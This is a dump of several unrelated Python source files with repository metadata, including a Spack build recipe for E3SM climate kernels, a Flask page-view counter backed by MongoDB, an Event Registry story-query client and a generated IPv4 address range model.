|
Python
| false
| false
| 1,887
|
py
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)

import os

from spack.package import *


class E3smKernels(MakefilePackage):
    """
    Climate kernels for Co-design that originate from the Energy
    Exascale Earth System Model (E3SM).
    """

    homepage = "https://github.com/e3SM-Project/codesign-kernels"
    url = "https://github.com/E3SM-Project/codesign-kernels/archive/refs/tags/v1.0.tar.gz"
    git = "https://github.com/E3SM-Project/codesign-kernels.git"

    maintainers = ["sarats", "philipwjones"]

    version("master", branch="master")
    version("1.0", sha256="358249785ba9f95616feecbb6f37f7694646568499c11b2094c9233999c6cc95")

    variant(
        "kernel",
        default="atmosphere",
        values=(
            "atmosphere",
            "mmf-mpdata-tracer",
        ),
        description="Specify E3SM Kernel to Build",
        multi=False,
    )

    @property
    def build_directory(self):
        return self.spec.variants["kernel"].value

    @property
    def build_targets(self):
        # Spack will provide optimization flags,
        # but we still need to pass in fortran flags for gfortran.
        args = []
        # Test for gfortran specifically due to hybrid compilers like llvm.
        if "gfortran" in self.compiler.fc:
            args.append("FFLAGS=-ffree-line-length-none")
        return args

    def install(self, spec, prefix):
        # Manually copy binaries over.
        mkdir(prefix.bin)
        if self.spec.variants["kernel"].value == "atmosphere":
            install(os.path.join("atmosphere", "atm"), prefix.bin.atm)
        elif self.spec.variants["kernel"].value == "mmf-mpdata-tracer":
            install(os.path.join("mmf-mpdata-tracer", "advect"), prefix.bin.advect)
[
"noreply@github.com"
] |
JayjeetAtGithub.noreply@github.com
|
d8534409bd889016971a612a14dde9520fab2066
|
255e19ddc1bcde0d3d4fe70e01cec9bb724979c9
|
/all-gists/3491924/snippet.py
|
206562a28b41564df1d60ab42576e7b4bb1dd96a
|
[
"MIT"
] |
permissive
|
gistable/gistable
|
26c1e909928ec463026811f69b61619b62f14721
|
665d39a2bd82543d5196555f0801ef8fd4a3ee48
|
refs/heads/master
| 2023-02-17T21:33:55.558398
| 2023-02-11T18:20:10
| 2023-02-11T18:20:10
| 119,861,038
| 76
| 19
| null | 2020-07-26T03:14:55
| 2018-02-01T16:19:24
|
Python
|
UTF-8
|
Python
| false
| false
| 860
|
py
|
import os
from urllib.parse import urlparse  # Python 3; the original used Python 2's urlparse module

from flask import Flask
from pymongo import MongoClient

MONGO_URL = os.environ.get('MONGOHQ_URL')

if MONGO_URL:
    # Get client
    client = MongoClient(MONGO_URL)
    # Get database
    db = client[urlparse(MONGO_URL).path[1:]]
else:
    # Not on an app with the MongoHQ add-on, do some localhost action
    client = MongoClient('localhost', 27017)
    db = client['MyDB']

app = Flask(__name__)
app.debug = True


@app.route('/')
def hello():
    myObj = db.analytics.find_one({'event': 'page_views'})
    if not myObj:
        myObj = {'event': 'page_views', 'count': 1}
    else:
        myObj['count'] += 1
    # Collection.save() was removed in PyMongo 4; upsert the document instead.
    db.analytics.replace_one({'event': 'page_views'}, myObj, upsert=True)
    return 'Hello World! ' + str(myObj['count'])


if __name__ == '__main__':
    # Bind to PORT if defined, otherwise default to 5000.
    port = int(os.environ.get('PORT', 5000))
    app.run(host='0.0.0.0', port=port)
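
# ------------------------------------------------------------------
# Illustrative usage note (not part of the original gist): run the app
# locally and hit the counter endpoint; each request increments the
# page_views document.
#
#   $ python app.py
#   $ curl http://localhost:5000/
#   Hello World! 1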
|
[
"gistshub@gmail.com"
] |
gistshub@gmail.com
|
7eae6423802f038e65f587ba7edb68bb345f425b
|
7a7a0663efd2c25adf26f6552e3c4e95e9ac4e63
|
/holon/models/rmm.py
|
b27372b02be9352ffcb461a93b9dea68933d012b
|
[] |
no_license
|
smizell/holon
|
2c5654094cb007a9fceae621630126d9173c4f2c
|
9cdf39b74cee31ed9c84c94b792814f0b9fc6483
|
refs/heads/main
| 2023-02-03T15:46:41.059117
| 2020-12-09T23:10:39
| 2020-12-09T23:10:39
| 317,355,430
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
from holon.principles import Principle

level0 = Principle(
    name="RMM Level 0",
    reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level0",
)

level1 = Principle(
    name="RMM Level 1",
    reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level1",
)

level2 = Principle(
    name="RMM Level 2",
    reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level2",
)

level3 = Principle(
    name="RMM Level 3",
    reference="https://martinfowler.com/articles/richardsonMaturityModel.html#level3",
)
|
[
"smizell@gmail.com"
] |
smizell@gmail.com
|
284fb1b51ef430201f817392977842c1cd80a739
|
49f61714a6f78d984fd2194d6064d84e891bc5b7
|
/2019-1/231/users/4237/codes/1796_1613.py
|
34c1d6c7aa6950bb644b8a059a48fc732ab82aae
|
[] |
no_license
|
psbarros/Variaveis3
|
b5c4e1517e7d94a846ee03791d25d5821a1c651c
|
3dcf6f810709ce03c78335acf9533e008a2ae125
|
refs/heads/master
| 2023-06-13T07:05:00.878430
| 2021-07-06T17:51:37
| 2021-07-06T17:51:37
| 383,549,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 201
|
py
|
from numpy import *

vet = input("Enter the physical activity: ")      # prompt translated from Portuguese
tempo = array(eval(input("And the time: ")))
i = 0
total = 0                                         # placeholder default; the original never defined one
if vet == 'ALONGAMENTO':                          # 'ALONGAMENTO' = stretching (kept as the expected input token)
    total = 3 * tempo
    i = i + 1
elif vet == 'CORRIDA':                            # 'CORRIDA' = running
    # The original submission was truncated after this line; the multiplier
    # and the final print are assumed placeholders, not the author's values.
    total = 5 * tempo
    i = i + 1
print(total)
|
[
"psb@icomp.ufam.edu.br"
] |
psb@icomp.ufam.edu.br
|
175287ff552e87d65033887d77371e0b868bf754
|
11ad22552bf6719214239a95d032f5559bf57dc5
|
/eventregistry/QueryStory.py
|
c139a651db188cdf76bd89d15031f14e17ff796f
|
[
"MIT"
] |
permissive
|
arunkumar6545/event-registry-python
|
803914d00a1ce6dda40a1673debac75222b0614e
|
2ccff7799a03f71189ed666f25f3eb673c1a8263
|
refs/heads/master
| 2020-09-10T15:46:57.804243
| 2019-11-16T16:57:06
| 2019-11-16T16:57:06
| 221,745,070
| 0
| 0
|
MIT
| 2019-11-14T16:52:00
| 2019-11-14T16:51:59
| null |
UTF-8
|
Python
| false
| false
| 6,706
|
py
|
from eventregistry.Base import *
from eventregistry.ReturnInfo import *


class QueryStory(Query):
    """
    Class for obtaining available info for one or more stories (clusters) in the Event Registry
    NOTE: Story in our terminology is a cluster of articles (and not a single article). An event is
    then something that consists of one or more stories (typically in different languages).

    @param storyUriOrList: a single story uri or a list of story uris
    """
    def __init__(self, storyUriOrList = None):
        super(QueryStory, self).__init__()
        self._setVal("action", "getStory")
        if storyUriOrList != None:
            self.queryByUri(storyUriOrList)


    def _getPath(self):
        return "/api/v1/story"


    def queryByUri(self, uriOrUriList):
        """search stories by their uri(s)"""
        self._setVal("storyUri", uriOrUriList)


    def setRequestedResult(self, requestStory):
        """
        Set the single result type that you would like to be returned. If some other request type was previously set, it will be overwritten.
        Result types can be the classes that extend RequestStory base class (see classes below).
        """
        assert isinstance(requestStory, RequestStory), "QueryStory class can only accept result requests that are of type RequestStory"
        self.resultTypeList = [requestStory]



class RequestStory:
    def __init__(self):
        self.resultType = None


    def getResultType(self):
        return self.resultType



class RequestStoryInfo(RequestStory):
    """
    return details about a story
    """
    def __init__(self, returnInfo = ReturnInfo()):
        self.resultType = "info"
        self.__dict__.update(returnInfo.getParams("info"))



class RequestStoryArticles(RequestStory):
    """
    return articles about the story
    """
    def __init__(self,
                 page = 1,
                 count = 100,
                 sortBy = "cosSim", sortByAsc = False,
                 returnInfo = ReturnInfo(articleInfo = ArticleInfoFlags(bodyLen = 200))):
        """
        return articles in the story (cluster)
        @param page: page of the articles to return (1, 2, ...)
        @param count: number of articles to return per page (at most 100)
        @param sortBy: order in which articles are sorted. Options: id (internal id), date (published date), cosSim (closeness to event centroid), sourceImportanceRank (importance of the news source, custom set), sourceAlexaGlobalRank (global rank of the news source), sourceAlexaCountryRank (country rank of the news source), socialScore (total shares in social media)
        @param sortByAsc: should the articles be sorted in ascending order (True) or descending (False) based on sortBy value
        @param returnInfo: what details should be included in the returned information
        """
        assert page >= 1, "page has to be >= 1"
        assert count <= 100
        self.resultType = "articles"
        self.articlesPage = page
        self.articlesCount = count
        self.articlesSortBy = sortBy
        self.articlesSortByAsc = sortByAsc
        self.__dict__.update(returnInfo.getParams("articles"))



class RequestStoryArticleUris(RequestStory):
    """
    return a list of article uris
    """
    def __init__(self,
                 sortBy = "cosSim", sortByAsc = False  # order in which story articles are sorted. Options: id (internal id), date (published date), cosSim (closeness to story centroid), socialScore (total shares in social media), facebookShares (shares on fb), twitterShares (shares on twitter)
                ):
        """
        return articles in the story (cluster)
        @param sortBy: order in which articles are sorted. Options: id (internal id), date (published date), cosSim (closeness to event centroid), sourceImportanceRank (importance of the news source, custom set), sourceAlexaGlobalRank (global rank of the news source), sourceAlexaCountryRank (country rank of the news source), socialScore (total shares in social media)
        @param sortByAsc: should the articles be sorted in ascending order (True) or descending (False) based on sortBy value
        """
        self.articleUrisSortBy = sortBy
        self.articleUrisSortByAsc = sortByAsc
        self.resultType = "articleUris"



class RequestStoryArticleTrend(RequestStory):
    """
    return trending information for the articles about the story
    """
    def __init__(self,
                 lang = mainLangs,
                 minArticleCosSim = -1,
                 returnInfo = ReturnInfo(articleInfo = ArticleInfoFlags(bodyLen = 0))):
        self.resultType = "articleTrend"
        self.articleTrendLang = lang
        self.articleTrendMinArticleCosSim = minArticleCosSim
        self.__dict__.update(returnInfo.getParams("articleTrend"))



class RequestStorySimilarStories(RequestStory):
    """
    compute and return a list of similar stories
    @param conceptInfoList: array of concepts and their importance, e.g. [{ "uri": "http://en.wikipedia.org/wiki/Barack_Obama", "wgt": 100 }, ...]
    @param count: number of similar stories to return (at most 50)
    @param dateStart: what can be the oldest date of the similar stories
    @param dateEnd: what can be the newest date of the similar stories
    @param addArticleTrendInfo: for the returned stories compute how they were trending (intensity of reporting) in different time periods
    @param aggrHours: time span that is used as a unit when computing the trending info
    @param returnInfo: what details should be included in the returned information
    """
    def __init__(self,
                 conceptInfoList,
                 count = 50,          # number of similar stories to return
                 dateStart = None,    # what can be the oldest date of the similar stories
                 dateEnd = None,      # what can be the newest date of the similar stories
                 lang = [],
                 returnInfo = ReturnInfo()):
        assert count <= 50
        assert isinstance(conceptInfoList, list)
        self.action = "getSimilarStories"
        self.concepts = json.dumps(conceptInfoList)
        self.storiesCount = count
        if dateStart != None:
            self.dateStart = QueryParamsBase.encodeDate(dateStart)
        if dateEnd != None:
            self.dateEnd = QueryParamsBase.encodeDate(dateEnd)
        if len(lang) > 0:
            self.lang = lang
        # setting resultType since we have to, but it's actually ignored on the backend
        self.resultType = "similarStories"
        self.__dict__.update(returnInfo.getParams("similarStories"))
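
# ------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module); the story
# uri and API key below are placeholders.
#
#   from eventregistry import EventRegistry
#   er = EventRegistry(apiKey = "YOUR_API_KEY")
#   q = QueryStory("eng-1234567")                        # placeholder story uri
#   q.setRequestedResult(RequestStoryArticles(page = 1, count = 10))
#   res = er.execQuery(q)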
|
[
"gleban@gmail.com"
] |
gleban@gmail.com
|
f5c72b1f3b8cbbe42360e74a8ca4056e885d0bab
|
ec760cb774a45a12d40529036b7fca3dd589223c
|
/services/TS29222_CAPIF_Routing_Info_API/capif_routing_info/models/ipv4_address_range.py
|
8bf453284830c0d9696da8ccd2b8deea4ae98178
|
[
"Apache-2.0"
] |
permissive
|
EVOLVED-5G/CAPIF_API_Services
|
e4d7f8c7fc9a69aa364787471c5bd54d51fd1cb8
|
c907c68d54adf3e3ad7be15ac6707b8c64a1b778
|
refs/heads/develop
| 2023-07-29T09:31:23.176795
| 2023-05-31T12:56:33
| 2023-05-31T12:56:33
| 416,657,882
| 15
| 5
|
Apache-2.0
| 2023-09-04T12:01:57
| 2021-10-13T08:46:52
|
Python
|
UTF-8
|
Python
| false
| false
| 3,479
|
py
|
# coding: utf-8

from __future__ import absolute_import
from datetime import date, datetime  # noqa: F401
from typing import List, Dict  # noqa: F401

import re  # noqa: E501

from capif_routing_info.models.base_model_ import Model
from capif_routing_info import util


class Ipv4AddressRange(Model):
    """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).

    Do not edit the class manually.
    """

    def __init__(self, start=None, end=None):  # noqa: E501
        """Ipv4AddressRange - a model defined in OpenAPI

        :param start: The start of this Ipv4AddressRange.  # noqa: E501
        :type start: str
        :param end: The end of this Ipv4AddressRange.  # noqa: E501
        :type end: str
        """
        self.openapi_types = {
            'start': str,
            'end': str
        }

        self.attribute_map = {
            'start': 'start',
            'end': 'end'
        }

        self._start = start
        self._end = end

    @classmethod
    def from_dict(cls, dikt) -> 'Ipv4AddressRange':
        """Returns the dict as a model

        :param dikt: A dict.
        :type: dict
        :return: The Ipv4AddressRange of this Ipv4AddressRange.  # noqa: E501
        :rtype: Ipv4AddressRange
        """
        return util.deserialize_model(dikt, cls)

    @property
    def start(self):
        """Gets the start of this Ipv4AddressRange.

        String identifying an IPv4 address formatted in the "dotted decimal" notation as defined in RFC 1166.  # noqa: E501

        :return: The start of this Ipv4AddressRange.
        :rtype: str
        """
        return self._start

    @start.setter
    def start(self, start):
        """Sets the start of this Ipv4AddressRange.

        String identifying an IPv4 address formatted in the "dotted decimal" notation as defined in RFC 1166.  # noqa: E501

        :param start: The start of this Ipv4AddressRange.
        :type start: str
        """
        if start is not None and not re.search(r'^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$', start):  # noqa: E501
            raise ValueError("Invalid value for `start`, must match the pattern `^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$`")  # noqa: E501

        self._start = start

    @property
    def end(self):
        """Gets the end of this Ipv4AddressRange.

        String identifying an IPv4 address formatted in the "dotted decimal" notation as defined in RFC 1166.  # noqa: E501

        :return: The end of this Ipv4AddressRange.
        :rtype: str
        """
        return self._end

    @end.setter
    def end(self, end):
        """Sets the end of this Ipv4AddressRange.

        String identifying an IPv4 address formatted in the "dotted decimal" notation as defined in RFC 1166.  # noqa: E501

        :param end: The end of this Ipv4AddressRange.
        :type end: str
        """
        if end is not None and not re.search(r'^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$', end):  # noqa: E501
            raise ValueError("Invalid value for `end`, must match the pattern `^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$`")  # noqa: E501

        self._end = end
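
# ------------------------------------------------------------------
# Illustrative usage sketch (not part of the generated file):
#
#   rng = Ipv4AddressRange.from_dict({'start': '10.0.0.1', 'end': '10.0.0.254'})
#   rng.start = '10.0.0.5'      # accepted: matches the dotted-decimal pattern
#   rng.start = '999.0.0.1'     # raises ValueError: fails the pattern check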
|
[
"jorge.moratinossalcines@telefonica.com"
] |
jorge.moratinossalcines@telefonica.com
|